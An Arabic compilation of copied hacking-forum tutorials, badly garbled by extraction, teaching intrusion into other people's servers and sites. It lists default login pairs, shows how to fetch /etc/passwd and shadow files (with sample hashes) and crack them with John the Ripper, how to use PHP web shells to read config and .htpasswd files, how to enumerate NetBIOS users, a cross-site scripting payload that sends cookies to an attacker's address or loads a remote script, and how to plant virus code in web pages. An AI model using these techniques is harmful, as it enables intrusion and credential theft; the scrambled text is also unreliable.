ألنظمة معظمها و لذلك جيدة برامج Linux /Unix systems هناك
البرنامج هذا على Exploit Generator و ويندوز بأنظمة خاص الشبكات
تفحص ننسى فدعنا الحراسة شديد موقع ستخترق كنت إن وإذا إال عنه الكشف يتم قد و شرعي غير العمل هذا ألن لمدة المنافذ
نظام تمتلك كنت المنفذ linux ما كان إذا أنه ذلك من يهمنا 21ما يدعمون أنهم ذلك فيعني كان FTP مفتوحا إن أنهم 23و فذلك
TelNet يملكون
Telnet وضع في أنت و السيرفر نوع معرفة هو ذلك الهدفمنAnonymous األمور تلك بكل للقيام العموم على و متصفحك في
تتعبفي ال حتى التالي الموقع في تحتاجه ما ستجد الذكر سالفةنافذة hakkerz.home.ml.org البحث بفتح قم حديثنا فلنتابع المهمtelnet إلى المنفذ غير ب 23و يبدأ الموقع كان إذا و www فجرب
إضافة فجرب بينات بإعطائك يقم لم فإن بدونها ذلكtelnet.Victim.com كلمة telnet مكان ترى ينجح www كما لم إذا ومن عليها حصلنا التي السرفرات مواقع من أي بمجرد whois جرب و
نوع بالتحديد و تحتاجها بيانات أية بتسجيل قم الدخول في نجاحك السيرفر
إلى المنفذ بتغيير قم ال 21اآلن منفذ إلى سيأخذك اآلن و ftp فإن كتابة جرب ذلك حصل
SYST المنفذ جرب محظوظا كنت إذا اآلن السيرفر نوع 80لتعرف ال منفذ يعد نوع http الذي اإلطالق على أهمها و بينات أي وسجل
يدعى برنامج جرب كله ذلك بعد تنجح لم فإذا Whats السيرفرRunning? ذلك سيسجل الضحية سيرفر لكن و يعمل قد و
ايجاد أو البرامج استخدام طريقتان هناك البداية في ذكرت كما وباستخدام عليه ستحصل الذي الباسوورد اآلن لنجرب و الباسوورد
$Login: root$Password: root
برامج أن حيث أوال هذا بتجربة من linux فلنقم بعدد محملة تأتيالقيام عليك لذلك هي كما تبقى غالبا هي و الجاهزة الباسوورد
باستخدام ال telnet باتصال و الذكر سالف الموقع من هو الذي وبتجربة وقم جهازك على الموجود العادي البرنامج تستخدم
التالية المستخدمين اسماء و الباسوورد
ACCOUNT: PASSWORD)login( root: )password( root
sys: sys / system / binbin: sys / bin
mountfsys: mountfsysadm: adm
uucp: uucpnuucp: anonanon: anonuser: user
games: gamesinstall: installdemo: demo
umountfsys: umountfsyssync: sync
admin: adminguest: guest
daemon: daemon
يستخدمون الذين الناساألغبياء من العديد هناك فإن تصلح لم إذا والبريد من األول الشق بتجربة قم كباسوورد الدخول أسماء
التي البيانات من أو كباسوورد كذلك و مستخدم كإسم االلكترونيمن عليها بالتجربة whois حصلت قم اآلن إلى تعيسالحظ كنت أن و
نظام إلى الدخول تحاول أنك افتراض على لربما unix التالية فإنكملف هناك أن الجواب و الباسوورد إلى النظام يتعرف كيف تتساءل
الطرق passwd يدعى إحدى و إليه للوصول المحاولة علينا لذلكال استخدام هي نافذة ftp القديمة باستخدام إليه سندخل الذي و
نظري في و لكن internet explorer المتصفح و الحالة هذه في ينفعباستخدام سابقا النافذة فتحنا كما و لهم معرف غير تكون أن عليك
IP jammer موقع في الكرة .hakkerz.home.ml.org الموجود سنعيدقم و بي األي اخفاء على يعتمد القادم و السابق عملنا إن بل ثانية
مثال التالي الشكل طريق عن بالتجربة
ftp:// abc.net أو ftp://ftp.abc.net/ بتجربة قم منها أي يعمل لم إن ومواقع من ftp أي المعطاة البيانات في موجودة whois كانت
مجلد على اضغط الدخول في نجحت أنك ستر etc\ فالنفترض األن وعلى passwd ملف كان إن و بفتحه وقم جهازك على بتنزيله قم
محظوظ فأنت التالي الشكل
root:2fkbNba29uWys:0:1:Operator:/:/bin/cshadmin:rYsKMjnvRppro:100:11:WWW
administrator:/home/Common/WWW:/bin/cshkangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
هو و المستخدم اسم ترى هنا الباسوورد kangaroo و تشفير وهو 3وليسهي a62i9qr بالتالي أشبه فوق المنظر سيكون أو
root:*:0:1:Operator:/:/bin/cshadmin:*:100:11:WWW
administrator:/home/Common/WWW:/bin/cshkangaroo:*:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
بباسوورد استعيضعنها المشفرة الباسوورد فإن تشاهد كما هنا وهو و تشفيرها فك يصعب
*’s أو x’s? برامج هناك فإن األعلى في النوع على حصلت إن ومثل تشريرها فك ليونكسو الباسوورد لملفات John the مخصصة
Ripper 1.5 كثيرة كلمات ملفات إلى يحتاج الذي .و
،،،انتهى
الـ ".26 ( PHP Shellدرسعن األول " )الجزء
> موقع من > pharaonicsمنقول< Arab VieruZ:الكاتب<
و المستخدمة والخداع الطرق يشرح شل اتشبي للبي موضوعلينكس اوامر
عليكم ...السالموحله سيرفر على موقع صاحب كل يرعب ملف شيل اتشبي البي
يمكن مما اسهل
فسمحولي قليال سأطوله لكن جدا بسيط الموضوع
: اوال
التالية الوصلة راجع
: ثانيا
الـ هو ما معرفة منك اتوقع كامال الموضوع قراءتك وبعد PHP اآلنShell
*-----------------------------------------------*
األول : الجزء
لينكس اوامر
*-----------------------------------------------*
الملفات سرد ls -a : امر
غيرها او المخفية الملفات جميع سرد
*-----------------------------------------------*
الملف عرضمحتويات cat او cat -e : امر
الملفوعرضمحتوياته فتح
*-----------------------------------------------*
الملف حذف rm -f : امر
تريد الذي الملف لحذف
*-----------------------------------------------*
المجلد حذف rm -d : امر
تريد الذي المجلد لحذف
*-----------------------------------------------*
النسخ cp -i : امر
تريد الذي الملف لنسخ
*-----------------------------------------------*
التسمية اعادة mv : امر
التسمية ألعادة
*-----------------------------------------------*
الكتب : بشراء لينكسقم اوامر من المزيد لمعرف مالحظةعلى وللحصول
ثم األمر بوضع كم األوامر من ألمر اكثر help-- معلومات
ls --help : مثال
*-----------------------------------------------*
*-----------------------------------------------**-----------------------------------------------*
الثاني : الجزء
األوامر تنفيذ : كيفية
*-----------------------------------------------*
تنفيذه -1 المراد األمر بكتابة قم للكتابة مربع ستجد
والمجلدات -2 الملفات تعرض هنا
فقط -3 المجلدات تعرض هنا
اآلن -4 عليه تعمل الذي الفلودر مكان
خطأ -5 وجود عند يحدث ما ليخبرك العالمة ضع*-----------------------------------------------**-----------------------------------------------*
الثالث : الجزء
الملف هذا لتحميل والطرق : الخدع
*-----------------------------------------------*
المشكله تأتي !!! هنا
انا اتبعها التي وسنستعرضبعضالطرق مستحيله ليست لكن شخصيا
الملف -1 تحميل منها تستطيع ثغرة ايجاد
الـ : حقت القديمة النوك ثغرة hacked.txt مثال
*-----------------------------------------------*
ذكي -2 الموقع صاحب وكان معين موقع اختراق نريد اننا لنفرضوحريص جدا
البحث نحاول و المستضيفة الشركة تحديد اوال تنفع قد طريقه هذيمواقع عن
يكون األستضافة نفسشركة في األقل على او نفسالسيرفر فيدلخ صاحبها
الملف منها نحمل ثغرة نلقى ونحاول
*-----------------------------------------------*
اتشبي -3 البي تدعم التي المجانية .المواقع
،،،انتهى
الـ " ( PHP Shellدرسعن الثاني " )الجزء
> موقع من > pharaonicsمنقول< Arab VieruZ:الكاتب<
مباشره الموضوع نتابع
*-----------------------------------------------**-----------------------------------------------*
الرابع : الجزء
الباسورد على الحصول :طرق
*-----------------------------------------------*
الـ موضوع سيأخذ الجزء PHP Shell 2 هذا
تواجه قد التي الطرق اصعب من هي الباسورد على الحصول طرق . المخترق
*-----------------------------------------------*
الـ -1 اكسس ملفات الباسمن بالعادة My SQL اخذ تسمى التيconfig.php
الـ في التالي األمر تنفيذ طريق الباسعن اخذ PHP Shell ويمكن
التالي األمر وكتابة الملف هذا فيه يوجد الذي المجلد الى الذهاب
cat config.php
المتغيرات احد في الباسورد وسيظهر
*-----------------------------------------------*
الـ -2 ملف من الباسالمشفر htpasswed. اخذ
قم تجده لم واذا السيرفر مجلدات احد في الملف هذا اجاد ويمكن بفتح
السابق htaccess. الـ الملف مكان تجد حتى
/home/site/.htpasswds/forum/admin/passwd : مثال
cat /home/site/.htpasswds/forum/admin/passwd : األمر
بتشفير الباسالمشفر رايبر DES ستجد ذا بجون تفكه تقدر يعني
user:nymw4oS3oerdY*-----------------------------------------------*
او -3 سيرفر األكستينشون : service.pwd طريقة
بيج بالفرونت الخاص الباسورد به ويوجد بيج للفرونت تابع وهوDES مشفر
مجلد داخل : ويوجد
_vti_pvt
cat /home/site/www/_vti_pvt/service.pwd : األمر
درس : راجع القسم DeXXa رابط بهذا الخاص
user:nymw4oS3oerdY
*-----------------------------------------------*
وهي -4 اال كمالحظة الكن كقسم اعتبارها يمكن : ال
الـ مثل سكربتات في تتحد المواقع بعض phpMyAdmin ان
السكربت هذا لدخول اكسسخاص موقع لكن ويكون
الـ بملف للقاعدة config.php ويكون الروت يكون
كان موقع ألي قاعدة اي وتمسح تعدل يمكن !! يعني
،،،انتهى
الـ " ( PHP Shellدرسعن الثالث " )الجزء
> موقع من > pharaonicsمنقول< Arab VieruZ:الكاتب<
الدرس هذا من األخير الخامسو الجزء
سأذكر مشاكل وجود من البد لكن األشياء معظم عرفت اآلن انك بمااصابني الذي
*-----------------------------------*
االخرى -1 المواقع عرض : مشكلة
في السيرفر في الموجودة المواقع : جميع
/home
الروت : مجلد الى بالذهاب قم / األمر
ls -a /home
لعرضه ما موقع ملفات يحوي مجلد كل مجلدات ستجد
ls -a /home/SITE
SITE = المجلد او الموقع اسم
*-----------------------------------*
الموقع -2 عرضملفات : مشكلة
بدخول تسمح ال السيرفرات انت home بعض كنت اذا اال الموقعالموقع صاحب او روت
: الحل
بدخول : قم
home/site/public_html/
او
home/site/www/
تعرض التي الموقع ملفات الى لدخول
*-----------------------------------*
تعمل -3 ال بعضاألوامر
بكرنل خاص دور باك استعمال ويجب حلها الصعب من مشكله هذهالسيرفر
الكرنل اصدار .اقصد
،،،انتهى
أداة " " anmap شرح
>منقول<> : الخجول الهكر بواسطة >مترجم
: اإلسمnmap - أمني ماسح و الشبكات كشفعن أداة
: الخالصةالخيارات - المسح أنواع
: الوصف
بمسح األفراد و النظام لمدراء يسمح لكي البرنامج هذا صممكبيرة شبكات
وتدعم . خدمات من يقدمون وماذا المضيفين معرفة و لتقرير اإلنماب
مثل المسح تقنيات من كبير : عدد
UDPTCP connect)(
TCP SYN )half open(ftp proxy )bounceattack(
Reverse-identICMP )ping sweep(
FINACK sweepXmas TreeSYN sweep
and Null scan.
مثل .. المتقدمة المميزات من عدد أيضا تقدم :اإلنماب
remote OS detection via TCP/IP fingerprintingstealth scanning
dynamic delay and retransmission calculationsparallel scanning
detection of down hosts via parallel pingsdecoy scanning port
filtering detectiondirect )non-portmapper( RPC scanning
fragmentation scanningflexible target and port specification
التي المهمه بالبورتات قائمة هيئة على ماتكون عادةا اإلنماب نتائج توجد
يعطينا . دائما واإلنماب المسح عملية عليها أجريت التي اآللة فيوالبروتوكول والحالة والعدد الخدمة وإسم البورتات
مرشحة غير أو مرشحة او مفتوحة تكون أن إما الحاله
البورت بهذا إتصال أي تقبل سوف اآللة أن تعني مفتوحة
) أخرى ) عقبة أي أو مرشح فلتر أو فايروول هناك أن تعني المرشحةمن اإلنماب وتمنع البورت هذا تغطي
ال أو مفتوحا كان إذا البورت حالة معرفة
مغلق بأنه اإلنماب لدى معروف البورت هذا بأن تعني مرشح غير ) اإلنماب ) محاولة في تدخل مرشح فلتر أو فايروول أي أن يبدو وال
إال معرفتهم يمكن وال الحاالت أغلب هي المرشحة غير والبورتاتالبورتات معظم يكون أن هي ، واحدة حالة في
ترشيح حالة في المسح عملة لهم أجريت التي
يبلغ أن فيمكن اإلنماب في المستخدمه الخيارات على وباإلعتمادهوست الريموت في التالية المميزة الحاالت : عن
المستخدم النظام
TCP sequencability
بورت بكل المرتبطة البرامج يشغلون الذين المستخدمين أسماء
إس إن الدي أسماءاألخرى .وبعضاألشياء
،،،انتهى
ثغرات " بدون السيرفرات إلقتحام " طريقة
> اإلسالمية الحزم شبكة منتديات من >منقول>network access :الكاتب<
بصراحه علم وال فن اي فيه ماشوف بصراحه انا الثغرات استخدامتسوي ماتحسانك يعني نظري وجه وهذي جاهز شي تستخدم انت
ووقت جهد منك ياخذ متعب شيله واحد كل ويمكن الثغرات استخدام غير جدا كثيره طرق في لكن
انسان انك بما لكن الثغرات استغالل في حتى واسلوبه طريقتهاقتحام مسئله اعتقد متمكن نفسك وتشوف هاكر انك يفترض
الواحد ممكن يعني وزمان بوقت تربطها ماراح موقع او سيرفريقدر الين يفشل مره وكل ثالثه شهرين شهر لمده يجلسيحاول
هذا الموضوع كتبت انا االساسهذا وعلى لنتيجه االخير في يوصلفيه الله وينفعنا مفيد يكون انه اتمنى انشالله الي
( بمواضيع ازعجتكم احساني المشاركه عن نتكلم ماراح
المشاركه (بنسبه ولو الدخول من تمكنك معروفه طرق اغلب% 50فيه على
الحظ بالعالم الموجوده 50السيرفرات %
عامه معلومات تكوين الغرضمنها دائمايكون االولى الجهمات اوالاي وعلى الهجوم نبدا هنا ومن مهاجمتته يراد الذي السيرفر عن
الهجوم يتركز اساس
حسب كامل اقتحام هجوم واحيانا خدمه حرمان هجوم يكون احيانالدينا الموجوده والمعلومات والمتوفر الموجود
باسم معينه شركه نخشعلى ودنا اننا لنفرض aswind.COM طيبعنوان مدى على التعرف هي األولى بهذه ip الخطوه الخاصه
سهل وهذا الشركهموقع في بالتسجيل انصح شي INTERNIC.NET اول
تستاهل خدمات يعطونك حتىاوال بي االي لمعرفه طريقتين هناك
الموقع طريق INTERNIC.NET عنالدوسباالمر برنامج طريق عن : والثانيه
NSLOOKUPSET TYPE = ALL
aswind.COMبالضبط هذي المعلومات تطلعلك : راح
Domain Name: ASWIND.COMRegistrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.comReferral URL: http://www.onlinenic.com/
Name Server: DNS.ASWIND.COMName Server: NS1.ASWIND.COM
Updated Date: 01-apr-2002
شركه ان هذا الكالم الملقامات aswind.com معنا ارقام وضعتب DNS = 2الخاصه
عدد خادم 2يعني DNS االقل على هناك يعني نشر لها وسوتبخدمه شغالين الموضوع DNS سيرفرين ان يتعتقدون هم يعني
خاصه لألجهزه التشغيل طاقه من كثير ياخذ DNS ماراح
بيانات وتعديل للدخول مجال في تصير DNS هنا العمليه ان بمعنىشوي واسعه
عنواوين من عنوانين بنشر قم ماسوو Ip فقط مثل فقطaswind.com لنفول عنوان من اكثر فيه انه لنفترض مثال 6لكن .
عنواونين وضع الشركات على اقترح كذا ووضع IP عشان للنشرل DNS خوادم حاجه في اساسا ألنك وبطيئه قديمه اجهزه DNSعلى
بتشغيل تقوم انك يعني وهذا على DNS وخدمه WIN2K دايناميكيجهاز وضعت اذا نظري في الجيده االفكار من وهذي واحد جهاز
بال DNS خاصفقط
اجهزه على مالقيتشي انك لنفرض بدايه DNS طيب في انك وبما
جميع بتجريب قم اذن الوقت من متسع عندك انه يعني هذا هجوممن عليها حصلت والتي لديك المتوفره وصدقوني HowIS العناوين
مجموعه تمسح انها مممكن بالنت موجوده ادوات موجوده IP فيهمعينه شبكه في
اسمه ملف بعمل قم اسم LMHOSTS طيب فيه لكل NetBios يوجودعليه IP عنوان تحصل انك استطعت
كالس من الشبكه ان عرفت انت سو 200.200.200.0وعنوانها C يعني ملف باسم NetBios باسم LMHOSTS لك N2 = 200.200.200.2 وملفعمل تحتاج بعدين من Net view //servername وهكذا اسم N1 لكلثانيه N254 إلى بسبطريقه بورت سكان تسوي كانك يعني
رقم جهاز رقم 1من جهاز 254إلىالعناوين ام فيها الخدمه تشتغل سوف الصحيحه لألجهزه وبالنسبه
طبعا تستجيب فلن متصله الغير
تسويشي ماتقدر االن اال انت \ طيبحساب من تتاكد تغييره Administrator بستقدر تم او ال واال موجود
ماتقدر الحال بطبيعه انت بنفسالصالحيات نيم يوزر هناك اذا اوبسهوله عليه تحصل
الوصول الطرق بعض من عليه للحصول خلفيه ابواب هناك اذنعيب يعتبر وهذا الشركه في الموجودين المستخدمين لبعضاسماء
عيون ليش Windwos من مدري ههههههههه تطنشهم النهاالنه تسويه ماتقدر انت االن بسأال خالله تعرفمن تقدر امر فيهعلى تحصل الزم انت يعني مباشر وصول حق username and مالك
password هو االمر المجال في موجود يوزر وهو net user اليبالمجال الموجودين المستخدمين جميع يستعرضلكههههههه بالهبل اسماء على للحصول طريقه فيه لكن
؟؟ كيفليسفقط جهازه يقوم دخول بتسجيل مستخدم يقوم عندما االن
مدير المثال سبيل على يعني جهازه اسم بل فقط اسمه بتسجيلحتى النظام مراقبه اسمها خدمه يشغل زحمه عنده صار اذا الشبكه
األقصى للحد وصل انه يعرفخدمه تقوم الدخول بتسجيل مستخدم يقوم Messenger عندما
Service اسماء كاحد المستخدم اسم الموجودين NetBios بتسجيلافتراضانك وعلى عنهم جالستبحث اساسا انت الي الشبكه في
بعنوان خادم على قام IP 200.200.200.200 دخلت اذا شخص اي فأنجهازك nbtstat -a 200.200.200.200 بعمل اسم معرفه من سيتكمن
جهازك كان واذا المستخدم سوف ) MSBROWSER واسم ال اوبالتفصيل ( عنها اتحدث
شخصباسم فيه لنفرضان IP 200.200.200.50 ورقم John طيببعمل قمت اذا فانك الشبكه في Nbtstat -a 200.200.200.50 موجود
شخصباسم فيه انه يضهرلك جهازه john راح johnPC واسممستخدم اسم معك موجود يكون ( األن طيب) Administrator احتمال
وشنسوي ؟
خدمه بتعطيل تسجيل ) Messenger Service قوم يتم ولن جهزك فيبتخشمخفي ( يعني النطاق في اسمك
ل االمر MSBROWSER وبالسنبه عمل بعد شفتها nbtstat -a اذاالتي االخطاء اكبر من وهذا للمجال استعراضرئيسي انه يعني هذا
يستطيع ال يدوخ المجال مراقب الن الشبكات مدراء بها يقومونالشبكات في دائما الثغرات هذه مثل استغالل وتستطيع التجميع
الداخليهالمتسخدم اسم على حصلت االن انت طيب
انتضميت يعني المشكله هي وهذي المرور كلمه محتاج انتتقدر لكن المرور كلمه على تحصل ماقدرت لكن الشبكه مع جهازكعليها متاكد ) nt senstiver تحصل معليشماني متحسسالشبكه او
السبيلنق ( . منالمرور كلمه على فعليا احصل اقدر كيف طيب
وجدت اذا هاذ جدا تاففه المستخدمين مرور كلمات ماتكون غالبا اصال
مثل برنامج المشكله l0pthcrack يعني لك .يحل
،،،انتهى
" Cross Site Scripting "
> الحلم منتدى من >منقول>tcp :الكاتب<
: المتطلبات
بلغة تامه HTML معرفة
وهي السكربتينق لغات على متعمق غير اطالعJAVASCRIPT ,PERL ,CGI ,VBSCRIPT
والهتمل سكربت الجافا من كلها المصايب شخصية نظر وجهة ومن
================================================== =============================================
المنشوده : االهداف
من * هامه معلومات سرقة فيها يتم التى الكيفية عن القارئ افهامالمستخدم جهاز
نوع * من المنتديات او YaBB and UBB او VBULLETIN اختراقنيوك بوست او نيوك البهب من المجالت
* اختطاف او الكوكيز سرقة فيها تتم التي الكيفية عن القراء افهامالمستخدمين من الجلسة
االختراق * مداخل توسيع القارئ يستطيع ان
================================================== ==============================================
عرضية : جمله
من وارجو فائده لها الشياء واستغالل للمخ تشغيل ليساال االختراقالتعود يحاول بان الموضوع هذا يقرا
عنه ويترك التطوير الى يلجأ ثم والترجمه القراءة مسألة علىاو لمنتدى منتدى من المطامر مسألة
تطور ... امة الى نحتاج هل االمنية الثغرات تطرح التي المواقعاالمية .. نحو انفسنا نطور ام نفسها
================================================== ==============================================
: المشكلة
نت او االكسبلورر مثل الوب مستعرضات فان معروف هو كماالسكربتات ... او النصوص مترجمات تاتي الخ سكيب
اننا فلو المستخدم جهاز على السكربتات ترجمة ويتم داخلها مبنيةمعين سكربت بها كان صفحة طلبنا
نفسالصفحه على ويظهره السكربت هذا يترجم المستعرض فان. المطلوبه
هذه ترفضمثل النقاشفانها مجموعات او للمنديات بالنسبة اماللخصوصية خرق وتعتبرها السكربتات
من حساسة معلومات لسرقة اغراضسيئة في تستغل قد اوالمستخدمين
السكربت ادراج كيفية يوضح التالي : المثال
Hello FOLKS board. This is a message.
>SCRIPT<malicious code>/SCRIPT<
This is the end of my message.
كلمة عالمتي malicious code ان بين في حقنها او ادرجها تمخبيث كود على تحتوي وقد السكربت
المنتديات ... برامج مصمموا فان لذلك الخ بيانات يرسل او يسرقاالدمن مكنها اذا اال يمنعونها ومطوروا
تفيل المنتدى مكن اذا استخدامها يتم قد او المصمم مثال HTML اواالمج خاصية مكان السكربت ادراج يتم
>script<document.write)'>img src="http://my_ip_address/'+document.******+'"<';>/script<
او صفحة في رابط شكل على يكتب ان السكربت يستطيع قد اوالمسنجر طريق عن لك يرسل او بالبريد لك يرسل
فيصفحة رابط عمل كيفية لك يوضح التالي والمثال
>A HREF="http://example.com/comment.cgi? mycomment=>SCRIPT<malicious code>/SCRIPT<"< Click
here>/A<
باحد يصلك عندما فقط انها الكود عمل كيفية في وركز هنا انظرالسكربت سينفذ عليه وتضغط اعاله المذكوره الطرق
السكربت ان لنفرض اكثر يرسل comment.cgi وللشرح سكربتللبحث سكربت يكون قد او الموقع لصاحب مالحظاتك
اسمه داخله متغير على يحتوي وهو المنتدى او الموقع فيmycomment تكتبها التي المالحظات او المدخالت ياخذ
من ناتجه ديناميكية صفحات ويولد بحث سكربت انه اعتبرناه فلوان فبدل وخيمة النتائج ستكون البحث
منه السكربت مايطلبه سينتج النشطه او الحيوية الصفحات ينتجداخل السكربت ضمن فقد هنا الفكره الحظ
ليأخذ نصوصاستخدم النصي الحقل ياخذ ان من فبدال نصي حقلالسكربت من . اوامر
التالي المثال الحظ اكثر االمور اعقد : وحتى
>A HREF="http://example.com/comment.cgi? mycomment=>SCRIPT SRC='http://bad-site/badfile'<>/SCRIPT<"<
Click here>/A<
اكثر طوره المره هذه لكن السابق نفسالسكربت استخدم هناوالذي اخر موقع ملفمن ادراج في مستخدما ليكون
باالسم مصادر BADFILE هو عدة فيه ادخل البيانات مصدر والنالهجوم هذا فأن المذكور السكربت طريق عن اخرى
عبور " cross-site scripting يسمىب برمجة عندي من الترجمه اوبرمجة " باستخدام عبرنا الننا الموقع
فوكس السيكيورتي في تالحظ كنت واذا موقع من اكثر السكربتاتب تختصر االمنيه المواقع اختصار CSS او وهي
اوراق CASCADE style sheets وليسل cross-site scripting ل ايالمتتالية االنماط
التالية الوسوم من اي السكربت عالمة او الوسم بدل يدخل قد
>SCRIPT<, >OBJECT<, >APPLET<, and >EMBED<
النماذج وسم هناك يكون ان الممكن وسوم >form< ومن HTML مناالوامر تنفيذ يمكن السابقة وبنفساالفكار
اخرى لصفحات توجيهك او اخرى بيانات او الكوكيز لسرقة منها
واليونيكود عشر السداسي التكويد عن ماكتبته قرات كنت اذااقصده ما تفهم ان االن تستطيع
================================================== =======
التفاصيل من : ولمزيد
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html
،،،انتهى
الزوار " سجل تدمير " كود
> المهندس منتديات من >منقول> العبقري: >الكاتب
, الزوار سجل تدمير على بقدرته كبير بحجمه جدا صغير كودفيسجل... توقيع عمل كيفية طبعا تعرفون انتم بالكامل
- - - - طريقة, للموقع تقديرك الشخصي موقعك األيميل األسم الزوارعلى...... تعليقك كتابة وهي المهمه والنقطه األستدالل
الموقع؟؟؟؟؟؟؟
نأتي عندما ولكن مطلوب هو ما شيحسب كل نضع سوف نحن ........... ونكتب نقف التعليق :لكتابة
.
.
.
.
.
.
.
.
.
.
.
.
.
الكود هو : هذا==================================================
= h3<put your text here>xmp<>plaintext<>--
==================================================
مكان في تريد شي اي كتابة .... put your text here يمكنك كل وهذاحصل .... ماذا ريفريشوانظر اعمل توقيعك بعد شي
:مالحظه=====
الزوار؟ سجل انواع بعض مع يعمل ال !الكود
،،،انتهى
صفحة " فايروسفي " وضع
> إعصار منتدى من >منقول>Dr^FunnY :الكاتب<
عادي ... االول مربعات ثالث تحت هاتالقي جديدة صفحة اختارمعاينة html والثاني والثالث
العادي في خليك انتادراج اختار
... ..... خليك خانتين من صغير جدول هايطلعلك ويب مكون اختار ثمهو اللي اختيار ااخر منها واختار اليمين على اللي االولى الخانة في " في" عناصر وهايظهرلك واحده اضغطضغطه متقدمة تحكم عناصر
هو اللي اختيار اول اختار اليسار على اللي ... "HTML" الخانه ... الفيرس كود ده المربع في تحط عليك انت تاني مربع هايفتحلك
موافق استوت وتضغط الطبخة وكده . لو لكن معندكشنورتن وانت الصفة معاينة على تضغط واوعى
فيروس بوجود تحذير هايديك عندكنفس هي انجليزي عنده واللي عربي بيج فرونت عنده للي الطريقه
االسامي تغيير مع .الخطوات
،،،انتهى
" الثغرااات
> الجهاد موقع من >منقول
Exploit = = ثغرة اسثمارالمهم :الجزء
استغاللها ويمكنك التشغيل نظام في برمجية أخطاء هي الثغرات.. إلخ وووو البيانات وقاعدة الباسوورد ملف على للحصول
الموقع حول الممكنة المعلومات كل تجمع أن يجب : أوالطريق -1 عن وهذ مثال والتلنت بي تي اإلف مثل المفتوحة المنافذ
مثل برامجsuper scan
االنترنت في عنه .ابحثوالفائدة -2 لينوكسوغيرها أم ويندوز الموقع تشغيل نظام معرفة
ملف به الذي المجلد واسم به الخاصة ثغراته له نظام كل أن ذلك منآلخر تشغيل نظام يختلفمن .الباسوورد
الموقع إلى إذهب التشغيل نظام لمعرفةwww.netcraft.net
!.!!.. الموقع عن المعلومات بعض وستعرف إنتر ثم الموقع واكتب... إلخ التشغيل ونظام كآليبي
ذلك -3 وغير كالبريد خدمات من الموقع مايقدمه كل معرفةالسي -4 وبرامج المنتديات مثل الموقع على المثبتة البرامج معرفة
آي جيالثغرات أنواع
المتصفح طريق عن إليها الوصول يمكن التي هي األنواع أبسطمثل
www.thesite.com/....../االستثمارات أو الباقية : واألنواع
بيرل بلغة مكتوبة pl.* ثغراتبرنامج لديك كان إذا ويندوز في لينوكسأو في استخدامها ويمكن
Active Perlسي بلغة ثغرات
*.c لينوكسفقط في استخدامها يمكنشل بلغة ثغرات
*.sh لينوكسفقط في استثمارها ويمكنبلينوكسفيمواقع الخاصة السابقة األنواع من الكثير إيجاد ويمكنك
بعضها وإليك الثغراتwww.securiteam.com
www.securityfocus.comwww.ukrt.f2s.com
www.ussrback.comwww.packetstorm.securify.com
www.secureroot.comwww.rootshell.com
في الموجودة بالبرامج عنها الكشف يمكنك المتصفح ثغرات أماالبرامج .قسم
أو كالمنتديات السيرفر على الموجودة البرامج خالل من ويمكنكمواقع في لها ثغرات عن تبحث أن آي وسيجي بيرل برمجيات
. تكون قد آي جي وسي بيرل وبرمجيات السابقة المواقع أو الثغراتزوار عداد حتى أو بحث محرك أو زوار كتاب
.. أن المشكلة الباسوورد ملف على حصلت أنك لنفرض حسنامضللة بداخله تكون مشفرة shadowed كلمةالسر .encryption أو
باسوورد لملف مثالroot:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/:
bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail
Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
المرخص األشخاص سر كلمات على يحتوي الباسوورد ملف وألنآالف يصل وقد أسطر عشرة عن بزيد ال قد الموقع بدخول لهم
...األسطرعالمة وهي مضللة السابقة السر x كلمات تختلف ..وقد
هكذا تكون عليها سنحصل والتي المشفرة :أماroot:x:0:1:Super-User:/:/sbin/sh مضللة
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh مشفرةroot = المستخدم اسم الجذر أو
x = مضللة ولكنها كلمةالسرمهم غير السطر وباقي
مضللة السر كلمة ستكون األغلب تبحث shadowed في أن عليك لذاالشادو ملف يسمى مشفرة السر كلمة يحوي آخر ملف عن
shadow fileالتشغيل نظام باختالف تختلف معينة أماكن في ويوجدtoken = الباسوورد عن يعبر الذي الرمز
Linux : /etc/shadow token = *SunOS : /etc/shadow token = هو اشهرها متعدده أشكال * يأخذ
FreeBSD : /etc/master.passwd or /etc/shadow token = * هو والجديدx
IRIX : /etc/shadow token = xAIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *لملفشادو مثال
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::
هي السر كلمة أن نجدEpGw4GekZ1B9U
التشفير؟ تفك كيفبرامج صفحة في تجده أفضلها لذلك مخصصة برامج طريق عن
الثغراتJohn the ripper
على يحصل حتى الممكنة المحاوالت كل بتجريب يقوم وهو. الباسوورد
وعليك مثال ملفمفكرة في الباسووردات له تضع أن يجب ولكنال من بدال المشفرة الكلمة كل xوضع يكون بحيث ترتيبها وعليك
فيسطر حسابتشغيله :طريقة
الدوسواكتب إلى إذهبjohn passwd
وضعتها passwd حيث المشفرة الباسوورد به الذي الملف هو : سيظهر
by Sola 97,John the Ripper Version 1.3 Copyright )c( 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONEانتر اضغط اآلن يخمنها التي الباسوورد معرفة أردت وإذا
به الذي نفسالمجلد ملففي في ستحفظ الصحيحة والباسوورداسمه البرنامج
john.potتغيير أو الملف إلغاء عليك أخرى كسر بعملية القيام أردت وإذا
. اسمه
،،،انتهىالثغرات " عن مفصل شبه " شرح
> إعصار منتدى من >منقول> icer:الكاتب<
التالي الى ينقسم اليوم : الموضوع؟ 1 اكسبلويتات تجد كيف
2 ؟ ) ( استثمارات نسميها دعونا االكسبلويتات تستعمل كيفاالستثمارات 3 من مختلفه ... انواع
الثغرات 4 عل للبحث مفيده ... مواقع××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××××××××××a face at the interface :
نظام عل الرووت عل تحصل لكي عاده تستخدم االستثماراتعباره .. هو الرووت و معين
